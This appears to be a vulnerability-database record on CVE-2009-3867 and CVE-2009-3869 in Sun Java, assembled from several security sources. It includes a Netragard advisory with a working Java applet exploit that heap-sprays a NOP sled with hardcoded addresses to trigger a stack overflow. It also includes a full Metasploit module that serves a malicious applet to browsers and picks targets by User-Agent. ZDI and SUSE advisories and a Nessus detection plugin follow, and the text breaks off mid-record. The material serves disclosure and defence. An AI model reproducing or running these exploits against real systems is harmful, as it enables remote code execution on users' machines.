\n+93>: mov %esi,%edi \n0x1891a80e <Java_com_sun_media_sound_HeadspaceSoundbank_nOpenResource \n+95>: sar $0x1f,%edi \n0x1891a811 <Java_com_sun_media_sound_HeadspaceSoundbank_nOpenResource \n+98>: mov %edx,0x4(%esp) \n0x1891a815 <Java_com_sun_media_sound_HeadspaceSoundbank_nOpenResource \n+102>: mov 0x8(%ebp),%edx \n0x1891a818 <Java_com_sun_media_sound_HeadspaceSoundbank_nOpenResource \n+105>: mov %edx,(%esp) \n0x1891a81b <Java_com_sun_media_sound_HeadspaceSoundbank_nOpenResource \n+108>: call *0x2a8(%eax) \n0x1891a821 <Java_com_sun_media_sound_HeadspaceSoundbank_nOpenResource \n+114>: add $0x450,%esp \n \n*/ \nimport javax.sound.midi.*; \nimport java.io.*; \nimport java.net.*; \n \nimport java.awt.Graphics; \npublic class test extends java.applet.Applet \n{ \npublic static Synthesizer synth; \nSoundbank soundbank; \n \npublic void init() \n{ \nString fName = repeat('/',1080); // OSX Leopard - 10.5 Build 9A581 \nJava(TM) 2 Runtime Environment, Standard Edition (build 1.5.0_13- \nb05-237) \n \n// heap sprayed info starts at 0x25580000+12 but keep in mind we \nneed to be fairly ascii safe. \n// 0x20 is not usable \nbyte[] frame = { \n(byte)0x22, (byte)0x21, (byte)0x58, (byte)0x25, // frame 1 - ebp \n(byte)0x26, (byte)0x21, (byte)0x58, (byte)0x25, // frame 1 - eip \n(byte)0x22, (byte)0x21, (byte)0x58, (byte)0x25 // frame 0 - edx \n}; \n \nString mal = new String(frame); \n \n//System.out.println(mal); \n \nfName = \"file://\" + fName + mal; \ntry \n{ \nsynth = MidiSystem.getSynthesizer(); \nsynth.open(); \nSystem.out.println(\"Spray heap\\n\"); \n \nString shellcode = \"\\u41424344\" + repeat('\\u9090',1000) + \n\"\\u30313233\"; // This is just a nop sled with some heading and \ntrailing markers. \nint mb = 1024; \n \n// Sotirov / Dowd foo follows. \n// http://taossa.com/archive/bh08sotirovdowd.pdf \n \n// Limit the shellcode length to 100KB \nif (shellcode.length() > 100*1024) \n{ \nthrow new RuntimeException(); \n} \n// Limit the heap spray size to 1GB, even though in practice the \nJava \n// heap for an applet is limited to 100MB \nif (mb > 1024) \n{ \nthrow new RuntimeException(); \n} \n// Array of strings containing shellcode \nString[] mem = new String[1024]; \n \n// A buffer for the nop slide and shellcode \nStringBuffer buffer = new StringBuffer(1024*1024/2); \n \n// Each string takes up exactly 1MB of space \n// \n// header nop slide shellcode NULL \n// 12 bytes 1MB-12-2-x x bytes 2 bytes \n \n// Build padding up to the first exception. We will need to set \nthe eax address after this padding \n// First usable addresses begin at 0x25580000+0x2121. Unfortunately \n0x20 in our addresses caused issues. \n// 0x2121 is 8481 in decimal, we subtract a few bytes for munging. \n \nfor (int i = 1; i < (8481/2)-4; i++) \n{ \nbuffer.append('\\u4848'); \n} \n \n// (gdb) x/10a 0x25582122-4 \n// 0x2558211e: 0x48484848 0x20202020 0x20202020 0x20202020 \n// 0x2558212e: 0x20202020 0x20202020 0x20202020 0x20202020 \n// 0x2558213e: 0x20202020 0x20202020 \n \n// Set the call address \n// 0x188fd81b \n<Java_com_sun_media_sound_HeadspaceSoundbank_nOpenResource+108>: \ncall *0x2a8(%eax) \n \nbuffer.append('\\u2122'); \nbuffer.append('\\u2558'); \n \n// 0x2a8 is 680 in decimal, once again we need filler for making \nthis a usable address location. \nfor (int i = 1; i < (680/2)-1; i++) \n{ \nbuffer.append('\\u4848'); \n} \n \n// where do we wanna go? 0x25582525 is right in the middle of the \nfollowing nop sled \n// (gdb) x/5x 0x25582525 \n// 0x25582525: 0x90909090 0x90909090 0x90909090 0x90909090 \n// 0x25582535: 0x90909090 \n \nbuffer.append('\\u2525'); \nbuffer.append('\\u2558'); \n \n// We are gonna place the shellcode after this so simply fill \nin remaining space with nops! \nfor (int i = 1; i < (1024*1024-12)/2-shellcode.length(); i++) \n{ \nbuffer.append('\\u9090'); \n} \n \n// Append the shellcode \nbuffer.append(shellcode); \n \n// Run the garbage collector \nRuntime.getRuntime().gc(); \n \n// Fill the heap with copies of the string \ntry \n{ \nfor (int i=0; i<mb; i++) \n{ \nmem[i] = buffer.toString(); \n} \n} \ncatch (OutOfMemoryError err) \n{ \n// do nothing \n} \n \n// Trigger the stack overflow. \nsynth.loadAllInstruments(MidiSystem.getSoundbank(new URL(fName))); \n} \ncatch(Exception e) \n{ \nSystem.out.println(e); \n} \n} \npublic void paint(Graphics g) \n{ \ng.drawString(\"Hello pwned!\", 50, 25); \n} \npublic static String repeat(char c,int i) \n{ \nString tst = \"\"; \nfor(int j = 0; j < i; j++) \n{ \ntst = tst+c; \n} \nreturn tst; \n} \n} \n \n[Fix] \n----------------------------------------------------------------------- \nhttp://support.apple.com/kb/HT3969 \nhttp://java.sun.com/javase/6/webnotes/ReleaseNotes.html \nhttp://sunsolve.sun.com/search/document.do?assetkey=1-66-270474-1 \n \n[Vendor Status] \n----------------------------------------------------------------------- \nVendor Notified and issue has been Patched \n \n[Vendor Comments] \n----------------------------------------------------------------------- \nJava for Mac OS X 10.6 Update 1 is now available and addresses the \nfollowing: \n \nCVE-ID: CVE-2009-3869, CVE-2009-3871, CVE-2009-3875, CVE-2009-3874, \nCVE-2009-3728, CVE-2009-3872, CVE-2009-3868, CVE-2009-3867, \nCVE-2009-3884, \nCVE-2009-3873, CVE-2009-3877, CVE-2009-3865, CVE-2009-3866 \n \nAvailable for: Mac OS X v10.6.2 and later, Mac OS X Server v10.6.2 and \nlater \n \nImpact: Multiple vulnerabilities in Java 1.6.0_15 \n \nDescription: Multiple vulnerabilities exist in Java 1.6.0_15, the most \nserious of which may allow an untrusted Java applet to obtain elevated \nprivileges. \n \nVisiting a web page containing a maliciously crafted untrusted Java \napplet \nmay lead to arbitrary code execution with the privileges of the \ncurrent user. \nThese issues are addressed by updating to Java version 1.6.0_17. Further \ninformation is available via the Sun Java website Credit to Kevin \nFinisterre \nof Netragard for reporting CVE-2009-3867 to Apple. \n \n[Why] \n----------------------------------------------------------------------- \nWe are often asked \"why do you do what you do?\". The answer is that \nour research helps to educate people about risks that affect them that \nmight otherwise go unnoticed. Often times our research ends up plugging \nholes that might end up resulting in a successful compromise if left \nunchecked. Want proof? Take a look at some of the comments taken \nfrom the article below: \n \nhttp://www.theregister.co.uk/2009/12/04/mac_windows_java_attack/ \n \nComment 1: Ben Lambert writes \n----------------------------- \n\"Oh that's just wonderful. So I can't update my \nmachines to a newer Java version because it breaks my critical app.. \n..or i can get exploited. I love my job.\" \n \nComment 2: windywoo wrote \n------------------------- \n\"This article was the first I heard about the patch so I checked \nSoftware Update and there it was.\" \n \n \n[Disclaimer] \n----------------------http://www.netragard.com------------------------- \nNetragard, L.L.C. assumes no liability for the use of the information \nprovided in this advisory. This advisory was released in an effort to \nhelp the I.T. community protect themselves against a potentially \ndangerous security hole. This advisory is not an attempt to solicit \nbusiness. \n \n<a href=\"http://www.netragard.com> \nhttp://www.netragard.com \n</a> \n \n \n \n \n \n`\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/84499/NETRAGARD-20091219.txt"}], "zdi": [{"lastseen": "2020-06-22T11:40:43", "bulletinFamily": "info", "cvelist": ["CVE-2009-3869"], "edition": 3, "description": "This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Sun Java Runtime Environment. User interaction is required to exploit this vulnerability in that the target must visit a malicious page. The specific flaw exists in the processing of arguments to the setDiffICM AWT library function. Due to the lack of bounds checking on one of the parameters to the function a stack overflow can occur. Successful exploitation of this vulnerability can lead to remote system compromise under the credentials of the currently logged in user.", "modified": "2009-06-22T00:00:00", "published": "2009-11-04T00:00:00", "href": "https://www.zerodayinitiative.com/advisories/ZDI-09-078/", "id": "ZDI-09-078", "title": "Sun Java Runtime AWT setDifflCM Stack Overflow Vulnerability", "type": "zdi", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "seebug": [{"lastseen": "2017-11-19T15:58:18", "description": "No description provided by source.", "published": "2014-07-01T00:00:00", "title": "Sun Java JRE AWT setDiffICM Buffer Overflow", "type": "seebug", "bulletinFamily": "exploit", "cvelist": ["CVE-2009-3869"], "modified": "2014-07-01T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-70816", "id": "SSV:70816", "sourceData": "\n ##\r\n# $Id: java_setdifficm_bof.rb 10394 2010-09-20 08:06:27Z jduck $\r\n##\r\n\r\n##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. Please see the Metasploit\r\n# Framework web site for more information on licensing and terms of use.\r\n# http://metasploit.com/framework/\r\n##\r\n\r\n\r\nrequire 'msf/core'\r\n\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n\tRank = GreatRanking\r\n\r\n\t#\r\n\t# This module acts as an HTTP server\r\n\t#\r\n\tinclude Msf::Exploit::Remote::HttpServer::HTML\r\n\r\n\tdef initialize(info = {})\r\n\t\tsuper(update_info(info,\r\n\t\t\t'Name' => 'Sun Java JRE AWT setDiffICM Buffer Overflow',\r\n\t\t\t'Description' => %q{\r\n\t\t\t\tThis module exploits a flaw in the setDiffICM function in the Sun JVM.\r\n\r\n\t\t\t\tThe payload is serialized and passed to the applet via PARAM tags. It must be\r\n\t\t\t\ta native payload.\r\n\r\n\t\t\t\tThe effected Java versions are JDK and JRE 6 Update 16 and earlier,\r\n\t\t\t\tJDK and JRE 5.0 Update 21 and earlier, SDK and JRE 1.4.2_23 and\r\n\t\t\t\tearlier, and SDK and JRE 1.3.1_26 and earlier.\r\n\r\n\t\t\t\tNOTE: Although all of the above versions are reportedly vulnerable, only\r\n\t\t\t\t1.6.0_u11 and 1.6.0_u16 on Windows XP SP3 were tested.\r\n\t\t\t},\r\n\t\t\t'License' => MSF_LICENSE,\r\n\t\t\t'Author' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t'jduck'\r\n\t\t\t\t],\r\n\t\t\t'Version' => '$Revision: 10394 $',\r\n\t\t\t'References' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t[ 'CVE', '2009-3869' ],\r\n\t\t\t\t\t[ 'OSVDB', '59710' ],\r\n\t\t\t\t\t[ 'BID', '36881' ],\r\n\t\t\t\t\t[ 'URL', 'http://sunsolve.sun.com/search/document.do?assetkey=1-66-270474-1' ],\r\n\t\t\t\t\t[ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-09-078/' ],\r\n\t\t\t\t],\r\n\t\t\t'Payload' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'Space' => 1024,\r\n\t\t\t\t\t'BadChars' => '',\r\n\t\t\t\t\t'DisableNops' => true,\r\n\t\t\t\t},\r\n\t\t\t'Targets' =>\r\n\t\t\t\t[\r\n=begin\r\n\r\nNo automatic targetting for now ...\r\n\r\n\t\t\t\t\t[ 'J2SE 1.6_16 Automatic',\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t'Platform' => ['win', 'linux', 'osx'],\r\n\t\t\t\t\t\t\t'Arch' => [ARCH_X86, ARCH_PPC]\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t],\r\n=end\r\n\t\t\t\t\t[ 'J2SE 1.6_16 on Windows x86',\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t'Platform' => 'win',\r\n\t\t\t\t\t\t\t'Arch' => ARCH_X86\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t],\r\n\t\t\t\t\t[ 'J2SE 1.6_16 on Mac OS X PPC',\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t'Platform' => 'osx',\r\n\t\t\t\t\t\t\t'Arch' => ARCH_PPC,\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t],\r\n\t\t\t\t\t[ 'J2SE 1.6_16 on Mac OS X x86',\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t'Platform' => 'osx',\r\n\t\t\t\t\t\t\t'Arch' => ARCH_X86,\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t],\r\n\t\t\t\t],\r\n\t\t\t'DefaultTarget' => 0,\r\n\t\t\t'DisclosureDate' => 'Nov 04 2009'\r\n\t\t\t))\r\n\tend\r\n\r\n\r\n\tdef on_request_uri(cli, req)\r\n\r\n\t\t# Create a cached mapping between IP and detected target\r\n\t\t@targetcache ||= {}\r\n\t\t@targetcache[cli.peerhost] ||= {}\r\n\t\t@targetcache[cli.peerhost][:update] = Time.now.to_i\r\n\r\n\t\tif (target.name =~ /Automatic/)\r\n\t\t\tcase req.headers['User-Agent']\r\n\t\t\twhen /Windows/i\r\n\t\t\t\tprint_status("Choosing a Windows target for #{cli.peerhost}:#{cli.peerport}...")\r\n\t\t\t\t@targetcache[cli.peerhost][:target] = self.targets[1]\r\n\t\t\twhen /PPC Mac OS X/i\r\n\t\t\t\tprint_status("Choosing a Mac OS X PPC target for #{cli.peerhost}:#{cli.peerport}...")\r\n\t\t\t\t@targetcache[cli.peerhost][:target] = self.targets[2]\r\n\t\t\twhen /Intel Mac OS X/i\r\n\t\t\t\tprint_status("Choosing a Mac OS X x86 target for #{cli.peerhost}:#{cli.peerport}...")\r\n\t\t\t\t@targetcache[cli.peerhost][:target] = self.targets[3]\r\n\t\t\telse\r\n\t\t\t\tprint_status("Unknown target for: #{req.headers['User-Agent']}")\r\n\t\t\tend\r\n\t\tend\r\n\r\n\t\t# Clean the cache\r\n\t\trmq = []\r\n\t\t@targetcache.each_key do |addr|\r\n\t\t\tif (Time.now.to_i > @targetcache[addr][:update]+60)\r\n\t\t\t\trmq.push addr\r\n\t\t\tend\r\n\t\tend\r\n\r\n\t\trmq.each {|addr| @targetcache.delete(addr) }\r\n\r\n\r\n\t\t# Request processing\r\n\t\tif (not req.uri.match(/\\.jar$/i))\r\n\r\n\t\t\t# Redirect to the base directory so the applet code loads...\r\n\t\t\tif (not req.uri.match(/\\/$/))\r\n\t\t\t\tprint_status("Sending redirect so path ends with / ...")\r\n\t\t\t\tsend_redirect(cli, get_resource() + '/', '')\r\n\t\t\t\treturn\r\n\t\t\tend\r\n\r\n\t\t\t# Display the applet loading HTML\r\n\t\t\tprint_status("Sending HTML to #{cli.peerhost}:#{cli.peerport}...")\r\n\t\t\tsend_response_html(cli, generate_html(payload.encoded),\r\n\t\t\t\t{\r\n\t\t\t\t\t'Content-Type' => 'text/html',\r\n\t\t\t\t\t'Pragma' => 'no-cache'\r\n\t\t\t\t})\r\n\t\t\treturn\r\n\t\tend\r\n\r\n\t\t# Send the actual applet over\r\n\t\tprint_status("Sending applet to #{cli.peerhost}:#{cli.peerport}...")\r\n\t\tsend_response(cli, generate_applet(cli, req),\r\n\t\t\t{\r\n\t\t\t\t'Content-Type' => 'application/octet-stream',\r\n\t\t\t\t'Pragma' => 'no-cache'\r\n\t\t\t})\r\n\r\n\t\t# Handle the payload\r\n\t\thandler(cli)\r\n\tend\r\n\r\n\r\n\tdef generate_html(pl)\r\n\r\n\t\thtml = <<-EOF\r\n<html>\r\n<head>\r\n<!-- <meta http-equiv=refresh content=10 /> -->\r\n</head>\r\n<body>\r\n<applet width='100%' height='100%' code='AppletX' archive='JARNAME'>\r\n<param name='sc' value='SCODE' />\r\n<param name='np' value='NOPS' />\r\n</applet>\r\n</body>\r\n</html>\r\nEOF\r\n\t\t# finalize html\r\n\t\tjar_name = rand_text_alphanumeric(32)+".jar"\r\n\t\thtml.gsub!(/JARNAME/, jar_name)\r\n\r\n\t\t# put payload into html\r\n\t\tdebug_payload = false\r\n\t\tpload = ""\r\n\t\tpload << "\\xcc" if debug_payload\r\n\t\tpload << pl\r\n\t\tif ((pload.length % 4) > 0)\r\n\t\t\tpload << rand_text((4 - (pload.length % 4)))\r\n\t\tend\r\n\t\tif debug_payload\r\n\t\t\tprint_status("pload #{pload.length} bytes:\\n" + Rex::Text.to_hex_dump(pload))\r\n\t\tend\r\n\t\thtml.gsub!(/SCODE/, Rex::Text.to_hex(pload, ''))\r\n\r\n\t\t# put nops into html\r\n\t\tnops = "\\x90\\x90\\x90\\x90"\r\n\t\thtml.gsub!(/NOPS/, Rex::Text.to_hex(nops, ''))\r\n\t\t#print_status("nops #{nops.length} bytes:\\n" + Rex::Text.to_hex_dump(nops))\r\n\r\n\t\treturn html\r\n\r\n\tend\r\n\r\n\r\n\tdef exploit\r\n\t\tpath = File.join(Msf::Config.install_root, "data", "exploits", "CVE-2009-3869.jar")\r\n\t\tfd = File.open(path, "rb")\r\n\t\t@jar_data = fd.read(fd.stat.size)\r\n\t\tfd.close\r\n\r\n\t\tsuper\r\n\tend\r\n\r\n\r\n\tdef generate_applet(cli, req)\r\n\r\n\t\tthis_target = nil\r\n\t\tif (target.name =~ /Automatic/)\r\n\t\t\tif (@targetcache[cli.peerhost][:target])\r\n\t\t\t\tthis_target = @targetcache[cli.peerhost][:target]\r\n\t\t\telse\r\n\t\t\t\treturn ''\r\n\t\t\tend\r\n\t\telse\r\n\t\t\tthis_target = target\r\n\t\tend\r\n\r\n\t\treturn @jar_data\r\n\tend\r\n\r\nend\r\n\n ", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-70816"}], "suse": [{"lastseen": "2016-09-04T12:42:11", "bulletinFamily": "unix", "cvelist": ["CVE-2009-3867", "CVE-2009-3875", "CVE-2009-3869", "CVE-2009-3874", "CVE-2009-3871"], "description": "IBM Java 1.4.2 was updated to 13 FP3.\n#### Solution\nThere is no known workaround, please install the update packages.", "edition": 1, "modified": "2010-01-12T17:42:00", "published": "2010-01-12T17:42:00", "id": "SUSE-SA:2010:003", "href": "http://lists.opensuse.org/opensuse-security-announce/2010-01/msg00003.html", "title": "remote code execution in java-1_4_2-ibm", "type": "suse", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-09-04T11:45:32", "bulletinFamily": "unix", "cvelist": ["CVE-2009-2493", "CVE-2009-3876", "CVE-2009-3873", "CVE-2009-3872", "CVE-2009-3867", "CVE-2009-3875", "CVE-2009-3869", "CVE-2009-3874", "CVE-2009-3871", "CVE-2009-3877", "CVE-2009-3868"], "description": "IBM Java 5 was updated to Service Refresh 11. It fixes lots of bugs and security issues.\n#### Solution\nThere is no known workaround, please install the update packages.", "edition": 1, "modified": "2010-01-12T09:21:12", "published": "2010-01-12T09:21:12", "id": "SUSE-SA:2010:002", "href": "http://lists.opensuse.org/opensuse-security-announce/2010-01/msg00001.html", "type": "suse", "title": "remote code execution in java-1_5_0-ibm", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-09-04T11:40:22", "bulletinFamily": "unix", "cvelist": ["CVE-2009-0217", "CVE-2009-3876", "CVE-2009-3873", "CVE-2009-3872", "CVE-2009-3867", "CVE-2009-3866", "CVE-2009-3875", "CVE-2009-3869", "CVE-2009-3874", "CVE-2009-3871", "CVE-2009-3865", "CVE-2009-3877", "CVE-2009-3868"], "description": "IBM Java 6 was updated to Service Refresh 7.\n#### Solution\nThere is no known workaround, please install the update packages.", "edition": 1, "modified": "2010-01-12T17:47:21", "published": "2010-01-12T17:47:21", "id": "SUSE-SA:2010:004", "href": "http://lists.opensuse.org/opensuse-security-announce/2010-01/msg00004.html", "title": "remote code execution in java-1_6_0-ibm", "type": "suse", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-09-04T11:20:17", "bulletinFamily": "unix", "cvelist": ["CVE-2009-3876", "CVE-2009-3873", "CVE-2009-3872", "CVE-2009-3867", "CVE-2009-3866", "CVE-2009-3875", "CVE-2009-3869", "CVE-2009-3874", "CVE-2009-3871", "CVE-2009-3865", "CVE-2009-3877", "CVE-2009-3864", "CVE-2009-3868"], "description": "The Sun Java 6 SDK/JRE was updated to u17 update fixing bugs and various security issues:\n#### Solution\nThere is no known workaround, please install the update packages.", "edition": 1, "modified": "2009-11-19T17:02:05", "published": "2009-11-19T17:02:05", "id": "SUSE-SA:2009:058", "href": "http://lists.opensuse.org/opensuse-security-announce/2009-11/msg00010.html", "title": "remote code execution in java-1_6_0-sun", "type": "suse", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "nessus": [{"lastseen": "2021-01-17T14:10:59", "description": "IBM Java 1.4.2 was updated to 13 fp3.\n\nThe following security issues were fixed :\n\n - A buffer overflow vulnerability in the Java Runtime\n Environment audio system might allow an untrusted applet\n or Java Web Start application to escalate privileges.\n For example, an untrusted applet might grant itself\n permissions to read and write local files, or run local\n applications that are accessible to the user running the\n untrusted applet. (CVE-2009-3867)\n\n - A security vulnerability in the Java Runtime Environment\n with verifying HMAC digests might allow authentication\n to be bypassed. This action can allow a user to forge a\n digital signature that would be accepted as valid.\n Applications that validate HMAC-based digital signatures\n might be vulnerable to this type of attack.\n (CVE-2009-3875)\n\n - A buffer overflow vulnerability in the Java Runtime\n Environment with processing image files might allow an\n untrusted applet or Java Web Start application to\n escalate privileges. For example, an untrusted applet\n might grant itself permissions to read and write local\n files or run local applications that are accessible to\n the user running the untrusted applet. (CVE-2009-3869)\n\n - A buffer overflow vulnerability in the Java Runtime\n Environment with processing image files might allow an\n untrusted applet or Java Web Start application to\n escalate privileges. For example, an untrusted applet\n might grant itself permissions to read and write local\n files or run local applications that are accessible to\n the user running the untrusted applet. (CVE-2009-3871)\n\n - An integer overflow vulnerability in the Java Runtime\n Environment with processing JPEG images might allow an\n untrusted applet or Java Web Start application to\n escalate privileges. For example, an untrusted applet\n might grant itself permissions to read and write local\n files or run local applications that are accessible to\n the user running the untrusted applet. (CVE-2009-3874)", "edition": 24, "published": "2010-01-12T00:00:00", "title": "SuSE 11 Security Update : IBM Java 1.4.2 (SAT Patch Number 1744)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-3867", "CVE-2009-3875", "CVE-2009-3869", "CVE-2009-3874", "CVE-2009-3871"], "modified": "2010-01-12T00:00:00", "cpe": ["cpe:/o:novell:suse_linux:11", "p-cpe:/a:novell:suse_linux:11:java-1_4_2-ibm-jdbc", "p-cpe:/a:novell:suse_linux:11:java-1_4_2-ibm-plugin", "p-cpe:/a:novell:suse_linux:11:java-1_4_2-ibm"], "id": "SUSE_11_JAVA-1_4_2-IBM-100105.NASL", "href": "https://www.tenable.com/plugins/nessus/43857", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from SuSE 11 update information. The text itself is\n# copyright (C) Novell, Inc.\n#\n\nif (NASL_LEVEL < 3000) exit(0);\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(43857);\n script_version(\"1.18\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2009-3867\", \"CVE-2009-3869\", \"CVE-2009-3871\", \"CVE-2009-3874\", \"CVE-2009-3875\");\n\n script_name(english:\"SuSE 11 Security Update : IBM Java 1.4.2 (SAT Patch Number 1744)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SuSE 11 host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"IBM Java 1.4.2 was updated to 13 fp3.\n\nThe following security issues were fixed :\n\n - A buffer overflow vulnerability in the Java Runtime\n Environment audio system might allow an untrusted applet\n or Java Web Start application to escalate privileges.\n For example, an untrusted applet might grant itself\n permissions to read and write local files, or run local\n applications that are accessible to the user running the\n untrusted applet. (CVE-2009-3867)\n\n - A security vulnerability in the Java Runtime Environment\n with verifying HMAC digests might allow authentication\n to be bypassed. This action can allow a user to forge a\n digital signature that would be accepted as valid.\n Applications that validate HMAC-based digital signatures\n might be vulnerable to this type of attack.\n (CVE-2009-3875)\n\n - A buffer overflow vulnerability in the Java Runtime\n Environment with processing image files might allow an\n untrusted applet or Java Web Start application to\n escalate privileges. For example, an untrusted applet\n might grant itself permissions to read and write local\n files or run local applications that are accessible to\n the user running the untrusted applet. (CVE-2009-3869)\n\n - A buffer overflow vulnerability in the Java Runtime\n Environment with processing image files might allow an\n untrusted applet or Java Web Start application to\n escalate privileges. For example, an untrusted applet\n might grant itself permissions to read and write local\n files or run local applications that are accessible to\n the user running the untrusted applet. (CVE-2009-3871)\n\n - An integer overflow vulnerability in the Java Runtime\n Environment with processing JPEG images might allow an\n untrusted applet or Java Web Start application to\n escalate privileges. For example, an untrusted applet\n might grant itself permissions to read and write local\n files or run local applications that are accessible to\n the user running the untrusted applet. (CVE-2009-3874)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=561831\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-3867.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-3869.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-3871.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-3874.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-3875.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Apply SAT patch number 1744.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Sun Java JRE AWT setDiffICM Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n script_cwe_id(119, 189, 310);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:java-1_4_2-ibm\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:java-1_4_2-ibm-jdbc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:java-1_4_2-ibm-plugin\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:11\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2010/01/05\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2010/01/12\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2010-2021 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)11\") audit(AUDIT_OS_NOT, \"SuSE 11\");\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SuSE 11\", cpu);\n\npl = get_kb_item(\"Host/SuSE/patchlevel\");\nif (pl) audit(AUDIT_OS_NOT, \"SuSE 11.0\");\n\n\nflag = 0;\nif (rpm_check(release:\"SLES11\", sp:0, reference:\"java-1_4_2-ibm-1.4.2_sr13.3-1.1.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:0, cpu:\"i586\", reference:\"java-1_4_2-ibm-jdbc-1.4.2_sr13.3-1.1.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:0, cpu:\"i586\", reference:\"java-1_4_2-ibm-plugin-1.4.2_sr13.3-1.1.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-17T14:44:20", "description": "IBM Java 1.4.2 was updated to 13 fp3.\n\nThe following security issues were fixed: CVE-2009-3867: A buffer\noverflow vulnerability in the Java Runtime Environment audio system\nmight allow an untrusted applet or Java Web Start application to\nescalate privileges. For example, an untrusted applet might grant\nitself permissions 